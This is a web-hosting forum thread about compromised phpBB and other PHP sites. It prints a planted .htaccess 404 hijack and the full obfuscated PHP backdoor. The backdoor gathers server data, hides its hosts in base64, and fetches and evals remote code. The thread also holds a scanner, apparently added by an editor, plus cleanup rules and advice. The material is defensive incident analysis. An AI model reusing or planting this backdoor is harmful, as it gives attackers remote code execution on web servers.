Strange .htaccess files

nzkiwi

Perch
I have a client who has installed phpBB, I assume from the CGI-Wizard in the Control Panel as most files have ownership of [username]:mblogistica instead of the more usual [username]:[username].

My concern is that there have appeared in directories with access permissions of 777 a .htaccess file and .php file that are dated about a month after phpBB was activated. Each php file has a different name, but consists of a series of digits - for example 223987.php. The .htaccess file refers to the php file. As both the .htaccess file and the php file have an ownership of httpd:httpd, I'm guessing the client is a hacking victim.

Example .htaccess file:
Code:
<Files *>
	Order Allow,Deny
	Deny from All
</Files>
Options -MultiViews
ErrorDocument 404 //forums/cache/223987.php
The 223987.php file:
Code:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6d2beb2e8c4b32759e39c3e909cb6dbf") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
Can anyone shed any light on these files?
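The pattern above (a world-writable directory, a dropped .htaccess whose ErrorDocument 404 points at an all-digit .php file, and base64-hidden hostnames inside that file) can be hunted for across a web root. The following triage scanner is an added example, not code from the thread; the sample tree it builds is constructed, and the base64 literal it plants decodes to the placeholder host example.invalid rather than anything from the real file.

```python
"""Triage scanner (added example, not from the thread): finds world-writable
directories holding a .htaccess whose ErrorDocument 404 points at an all-digit
.php file, and decodes base64_decode("...") literals in such files."""
import base64
import os
import re
import stat
import tempfile

ERRORDOC_RE = re.compile(r"^\s*ErrorDocument\s+404\s+(\S+\.php)\b", re.I | re.M)
NUMERIC_PHP_RE = re.compile(r"^\d+\.php$")
B64_LITERAL_RE = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')

def decode_b64_literals(php_source):
    """Decode every base64_decode("...") string literal found in PHP source."""
    decoded = []
    for literal in B64_LITERAL_RE.findall(php_source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: bad padding/alphabet
            decoded.append("<undecodable>")
    return decoded

def scan_webroot(root):
    """Return findings as (directory, world_writable, reason, detail) tuples."""
    findings = []
    for dirpath, _subdirs, files in os.walk(root):
        writable = bool(os.stat(dirpath).st_mode & stat.S_IWOTH)  # the 777 case
        if ".htaccess" in files:
            with open(os.path.join(dirpath, ".htaccess"), errors="replace") as fh:
                for target in ERRORDOC_RE.findall(fh.read()):
                    findings.append((dirpath, writable, "errordoc-404-php", target))
        for name in sorted(files):
            if NUMERIC_PHP_RE.match(name):  # e.g. 223987.php
                with open(os.path.join(dirpath, name), errors="replace") as fh:
                    hosts = decode_b64_literals(fh.read())
                findings.append((dirpath, writable, "numeric-php", (name, hosts)))
    return findings

def build_constructed_sample():
    """Constructed sample tree mirroring the thread's layout; host is a placeholder."""
    root = tempfile.mkdtemp()
    cache = os.path.join(root, "forums", "cache")
    os.makedirs(cache)
    os.chmod(cache, 0o777)  # the world-writable directory the poster describes
    with open(os.path.join(cache, ".htaccess"), "w") as fh:
        fh.write("<Files *>\n Deny from All\n</Files>\nErrorDocument 404 //forums/cache/223987.php\n")
    with open(os.path.join(cache, "223987.php"), "w") as fh:
        fh.write('<? $f=base64_decode("ZXhhbXBsZS5pbnZhbGlk"); ?>')  # "example.invalid"
    return root
```

Run `scan_webroot("/path/to/webroot")` on a real account to list every affected directory, then compare the decoded hosts against outbound traffic in the server logs.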
 
with 777 permissions, yes it looks like a 404 error 'hijack' or something similar to me.
 
Ok, I've removed the offending files from all directories I can find with 777 permissions. To those directories which should be accessed only by scripts, I have added a new .htaccess file:
Code:
Order Deny,Allow
Deny from all
To the other writable directories I have added this .htaccess file:
Code:
<Files ~ "\.(php|php3|php4|php5|phtml|pl|cgi|shtm|shtml)$">
  order deny,allow
  deny from all
</Files>
It's a pity that writable directories created by the phpBB install script weren't better protected at the outset.

Anything else I should do to keep the site safe?
 
I've seen an attack like this before on a server running a commercial shopping cart software - not sure if that's relevant, but the attacker had to gain access somehow.

It was accompanied by HTTP requests to non-existing files, like in your case 223987.php, which would run the script indicated by that 404 directive. The script, as you can tell, just builds a big string with system info and sends the whole thing back by another HTTP request to the compromised server that sent it.

Having said that, I have to admit I don't understand it. This is the info you would find if you ran a script with phpinfo() - I'm guessing they're just looking for some attack vectors to try in some automated attack?? One difference, when I saw this happening, there were many such files in many directories, not just one.
 
This particular site has SiteStudio and phpBB installed from the Control Panel. The offending files were in every directory with 777 permissions. I've started looking through a few other customer sites and some of these also have the same problem. Every site affected runs a php script such as Coppermine Photo Gallery, osCommerce, MODx CMS etc. Wherever there is a web writable directory, the offending files appear X(
 
You might want to check your transfer statistics, storage statistics, and database statistics.

I received a couple notices of accounts nearing their resource limits - when I checked I found things like databases using 100+MBs and a couple of sites were reporting 30+MB of traffic per DAY. I've got one site that is at almost 10GB of used storage, and I still have not found what is taking up so much space!!

I've seen the same pattern too - all these problems are on sites with various PHP packages - in my case COPPERMINE, JOOMLA, DRUPAL, and GALLERY2.

I'm in the process of trying to track down what exactly is happening - but the stats pages only show 30MB of daily traffic and the most visited URL is /drupal/ or /gallery/....

BTW- I only received a warning message for one site/account - when I saw what was happening I started looking into other accounts and noticed the abnormal traffic/storage/mysql storage issues.
 
used space and used transfer/traffic are two different things, just be sure you don't get confused when looking, as logs won't have used storage, but will have used transfer.
 
@Stephen:
Just wondering if you have any advice when looking into things like this?

I'm just getting started investigating this, but it seems unusual...

For instance - one specific case was 12MB of traffic to /coppermine/main.php - the file main.php is only a few KB! On that same site, the database is FULL of bizarre entries like 'event: updated <em>dTQixoLtuwSvFIW</em>.' We're talking 100+MB databases with hundreds of thousands of entries like this.

I mentioned looking at both logs and storage since it seems like some of the sites with mysql database abuse don't seem to be triggering either storage or bandwidth alerts...

Crazy hackers....I'd love to know exactly why they are doing this and what it is!!
 
it isn't really hackers, it is compromised home/office PCs scanning networks first, they then get noted as possibly vulnerable versions and then get hacked/defaced by a person using a known exploit in most cases.
 
Yeah, 'hackers/ing' really isn't a good term for them/it...

I hate to bog you down with questions, but how serious is something like this?

I'm seeing a lot of activity in my databases (thousands and thousands of bizarre new records). But right now they are not affecting the actual website content.

For instance, on a Drupal site there was 66MB of data in the MySQL database that was all stuff inserted by 'hackers'. The site itself, and the content, was not touched.

I'm concerned because (1) I don't want to needlessly waste server resources and (2) I really don't want to give 'hackers' free access to my (your) servers for posting links to all kinds of crap. I imagine all that activity
 
sure I understand, most of this is probably coming from mods, extensions, etc. allowing access to certain tables.

One big thing that causes abuse is actually that stupid guestbook script hsphere pre-installs.

One time I saw a server using 800MB of RAM in bursts, it was trying to use perl and open a 1GB guestbook txt file that was almost 100% spam links.

The client wasn't using it, I just disabled it and compressed the file down to a few MB.
 